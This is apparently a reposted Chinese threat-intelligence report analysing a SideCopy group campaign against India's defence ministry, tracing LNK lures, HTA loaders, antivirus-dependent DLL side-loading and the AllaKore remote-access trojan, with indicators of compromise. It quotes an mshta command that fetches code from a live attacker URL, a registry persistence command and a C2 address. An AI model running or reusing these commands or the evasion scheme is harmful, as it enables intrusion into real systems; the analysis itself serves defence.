成功捕获!SideCopy组织疑似针对印度国防部的攻击样本

admin 2022年7月13日21:46:15评论12 views字数 4992阅读16分38秒阅读模式

成功捕获!SideCopy组织疑似针对印度国防部的攻击样本

事件背景

      近日,猎影实验室捕获到SideCopy组织疑似针对印度国防部的攻击样本,样本攻击流程仍然以模仿SideWinder为主,通过钓鱼邮件下发包含有恶意LNK文件的压缩包,该LNK文件伪装成PDF文件诱使目标运行,运行后下载多阶段加载器,最后释放SideCopy组织常用的远控工具AllaKoreRAT。


     诱饵文件冒充指挥官副手向陆军部队下发指令,完整信函如下。

成功捕获!SideCopy组织疑似针对印度国防部的攻击样本


      攻击流程如下图:

成功捕获!SideCopy组织疑似针对印度国防部的攻击样本


攻击分析

01

第一阶段

      原始样本中包含伪装成PDF文件的LNK文件,运行后将执行C:WindowsSystem32mshta.exe https://tmeew.com/assets/carousel/files/LVE_CUM_POSTING_(ARMY_PERS)/jspxtoolkit

成功捕获!SideCopy组织疑似针对印度国防部的攻击样本


     LNK文件中执行的链接将跳转至

hxxps://tmeew[.]com/assets/carousel/files/LVE_CUM_POSTING_(ARMY_PERS)/jspxtoolkit/jqueryxmlcss.hta。


      该代码来自开源项目CACTUSTORCH,魔改后的函数参数为data, filename。

成功捕获!SideCopy组织疑似针对印度国防部的攻击样本
成功捕获!SideCopy组织疑似针对印度国防部的攻击样本


    在加载器中对应代码如下,即传入数据经base64解码并解压到%Temp%目录下。

成功捕获!SideCopy组织疑似针对印度国防部的攻击样本


     随后检测本地是否开启WindowsDefender,并下载后续负载:

     hxxps://tmeew[.]com/assets/carousel/nttoolkit/ -> C:\ProgramData\HP\jquery.txt;

     hxxps://tmeew[.]com/assets/carousel/cyxtoolkit/ -> C:\ProgramData\HP\jscy.txt

成功捕获!SideCopy组织疑似针对印度国防部的攻击样本


02

第二阶段

     下载的文件jquery.txt仍然是采用base64解码后解压的方式得到jquery.hta。


     jquery.hta与一阶段jqueryxmlcss.hta的文件逻辑构造相似,增加有反病毒产品检测,以及参数变更为exeBytes, dllBytes。

成功捕获!SideCopy组织疑似针对印度国防部的攻击样本


    第二阶段DLL文件将根据目标机器上安装的反病毒产品进行后续操作


检测到Kaspersky杀毒软件时,

执行以下操作

●创建C:\ProgramData\gvnntr\目录,将C:\Windows\System32\credwiz.exe文件拷贝至该目录,在自启目录以及C:\Users\Public\目录下创建gvnntrSettings.lnk文件用于启动credwiz.exe并实现持久化,lnk文件包含指令如下:C:WindowsSystem32cmdexe-/c start /b C:ProgramDatagvnntrcredwiz.exe


●将EXE数据(3b4abb7b29f7f41b30f4ed8d86dc6c8a)写入%Temp%\gvnntr\gvnntr.txt,并将DLL数据(cf134c9ac335f549055fe2eff65e9921)写入C:\ProgramData\newimage.jpg,写入成功后将newimage.jpg移动至C:\ProgramData\gvnntr\DUser.dll


●通过Powershell指令将%Temp%\gvnntr\gvnntr.txt重命名为gvnntr.exe


●最后执行C:\Users\Public\gvnntrSettings.lnk

成功捕获!SideCopy组织疑似针对印度国防部的攻击样本


检测到Avast杀毒软件时,

执行以下操作

●创建C:\ProgramData\gvnntr\目录,将C:\Windows\SysWOW64\credwiz.exe文件拷贝至该目录

将DLL数据写入C:\ProgramData\newimage.jpg后将newimage.jpg移动至C:\ProgramData\gvnntr\DUser.dll


●在C:\ProgramData\gvnntr\目录下创建gvnntr.bat文件并启动以实现持久化,gvnntr.bat文件内容如下:REG ADD "HKCUSOFTWAREMicrosoftWindowsCu3b4abb7b29f7f41b30f4ed8d86dc6c8arrentVersionRun" /V "gvnntr" /t REG_SZ /F /D "C:ProgramDatagvnntrcredwiz.exe"


●直接将EXE数据写入%Temp%\gvnntr\gvnntr.exe


●休眠3min后,启动 C:ProgramDatagvnntrcredwiz.exe

成功捕获!SideCopy组织疑似针对印度国防部的攻击样本


检测到Avira杀毒软件时,

执行以下操作

在C:\ProgramData\gvnntr\目录下创建gvnntr.bat文件并启动以实现持久化,gvnntr.bat内容同上,将EXE数据写入TXT,DLL数据写入DUser.dll

成功捕获!SideCopy组织疑似针对印度国防部的攻击样本


检测到Quick杀毒软件时,

执行以下操作

●创建C:\ProgramData\gvnntr\,将credwiz.exe文件拷贝至该目录,将DLL数据写入C:\ProgramData\extrafile.txt后移动至C:\ProgramData\gvnntr\DUser.dll


●通过BAT文件实现持久化,释放EXE数据到%Temp%\gvnntr\gvnntr.exe


●休眠1min,启动 C:ProgramDatagvnntrcredwiz.exe


检测到WindowsDefender杀毒软件时,

执行以下操作

●创建C:\ProgramData\gvnntr\,将credwiz.exe文件拷贝至该目录,将DLL数据写入C:\ProgramData\newimage.jpg后将newimage.jpg移动至C:\ProgramData\gvnntr\DUser.dll


●在C:\ProgramData\gvnntr\目录下创建gvnntr.bat文件并启动以实现持久化,将EXE数据写入%Temp%\gvnntr\gvnntr.exe


●休眠1min,启动 C:ProgramDatagvnntrcredwiz.exe

      Loader下载的另一文件jscy.txt,主要是将上述变量gvnntr更改为vmmbs,其他逻辑均不变。其中EXE数据与DLL数据hash值如下

072fb8ca7c0dce0888707ccbbd37723d | DLL

98a0ed81f68297ea804e8209a28b91be | EXE

03

第三阶段

      credwiz.exe启动后将加载同目录下的DUser.dll,该DLL的主要功能为启动%Temp%\gvnntr\gvnntr.exe

成功捕获!SideCopy组织疑似针对印度国防部的攻击样本


     gvnntr.exe为最终阶段远控软件AllaKore RAT。AllaKore是一种公开可用的基于Delphi的RAT,常与CetaRAT一起用于SideCopy的攻击活动中。AllaKore的恶意功能包括:键盘记录、捕获屏幕截图、列出文件夹和文件、上传/下载文件、窃取剪贴板数据、获取/更换壁纸。


       此次活动中,该RAT被命名为POISONManager

成功捕获!SideCopy组织疑似针对印度国防部的攻击样本


      其中包含的29553fb6797c15d99bcb2d9e27abd49d组件可关联到其他AllaKore远控工具,最终连接到 209.126.80.23:{6391、3281}

成功捕获!SideCopy组织疑似针对印度国防部的攻击样本

      tmeew[.]com解析到162.241.85.104


思考总结

01

关联

      通过样本特征我们关联到该组织在今年上半年攻击活动中的样本如下。

Hash

FileName/描述

2e4dad3a26976010983cc142127db4e5

LVE_CUM_POSTING_(ARMY_PERS).pdf.lnk

8d2c06e34c6c8b8fa7fb10a11155209a

IMG_20210824_093557.jpg.lnk

02b05564439ed9a3bb00a869d06c05dd

IMG_20210420_160203.jpg.lnk

6defaf3c52ed85aa056546ad17137369

pay and allces.pdf.lnk.jpg.lnk(薪酬与福利)

254deb71e7833cd784f0112b120a22f6

IMG_20201230_130459.jpg.lnk

1e437d8cb03950655d38a310928de43c

Army-Cyber-Gp-Alt-Feb-2022.pdf.lnk(陆军网络研究所)

4eda1982d897c05df9f501e812da645a

IMG_20210107_113330.jpg.lnk

73396e95fd451ec770575c5ca15a3994

IMG_20210107_113433.jpg.lnk

3fc3f755d6ffb0fe05255a107e23fdc9

Updated-Pay-and-Allowances-Order.pdf.lnk(更新的工资和津贴订单)

8087271af2e88e6d0a2155e910e8d7bd

IMG_20210107_113548.jpg.lnk

278ea2f466cee0c26849b49b04cfd064

IMG_20210423_145311.jpg.lnk

f01f09fbbecac9082005f45240ae0ca8

(Covid 19 审查文件)

9840f8c397dd5a978f6b10044dca54ff

IMG_20210107_114816.jpg.lnk

d59cc2050e4a604231ac17c05af3b6a6

(选举相关)

199f37e9a4e639487900c368eb7699b8

IMG_20210424_112355.jpg.lnk

61138dcf0a7cf4aaa224745f45826350

revised-criteria.pdf.lnk(单位修订文件审查)

281f5db2e7bdc3765a15035fa11f8364

IMG_20210107_113448.jpg.lnk

bdd4de79eec3683377102d667438d42c

IMG_20210117_122021.jpg.lnk

255e2c84f53e7be6dfb830a8cc73b276

IMG_20210424_112355.jpg.lnk


02

总结

     SideCopy组织近一年来攻击活动频繁,攻击武器从C#、Delphi发展至Golang,从Windows发展至多平台,攻击目标却始终牢牢锁定印度国防部。此外,该组织乐此不疲地在攻击活动中使用LNK伪装成JPG、Word、PDF等文件,说明此攻击手段针对特定目标人群有较大的成功率。


     安恒建议广大用户谨慎对待未知来源的邮件附件及链接,提高对LNK文件攻击的警惕。如有需要鉴别的未知来源样本,可以投递至安恒云沙箱查看判别结果后再进行后续操作。


防范建议

      目前安全数据部已具备相关威胁检测能力,对应产品已完成IoC情报的集成:

 ●安恒产品已集成能力:

     针对该事件中的最新IoC情报,以下产品的版本可自动完成更新,若无法自动更新则请联系技术人员手动更新:

(1)AiLPHA分析平台V5.0.0及以上版本

(2)AiNTA设备V1.2.2及以上版本

(3)AXDR平台V2.0.3及以上版本

(4)APT设备V2.0.67及以上版本

(5)EDR产品V2.0.17及以上版本

 ● 安恒云沙盒已集成了该事件中的样本特征:

      用户可通过云沙盒:

https://ti.dbappsecurity.com.cn/sandbox,对可疑文件进行免费分析,并下载分析报告。

 ● IOC:

          关注公众号留言“ 20220712 ”,即可获取。


精彩推荐

朝鲜黑客利用Maui攻击美国医疗组织长达一年之久

2022.07.11

成功捕获!SideCopy组织疑似针对印度国防部的攻击样本

专业恶意软件频现?这家IT服务巨头也成为攻击目标!

2022.07.08

成功捕获!SideCopy组织疑似针对印度国防部的攻击样本

NPM 供应链攻击影响数百个网站和应用程序

2022.07.07

成功捕获!SideCopy组织疑似针对印度国防部的攻击样本

成功捕获!SideCopy组织疑似针对印度国防部的攻击样本


注:本文由E安全编译报道,转载请联系授权并注明来源。

原文始发于微信公众号(E安全):成功捕获!SideCopy组织疑似针对印度国防部的攻击样本

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月13日21:46:15
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   成功捕获!SideCopy组织疑似针对印度国防部的攻击样本http://cn-sec.com/archives/1174260.html

发表评论

匿名网友 填写信息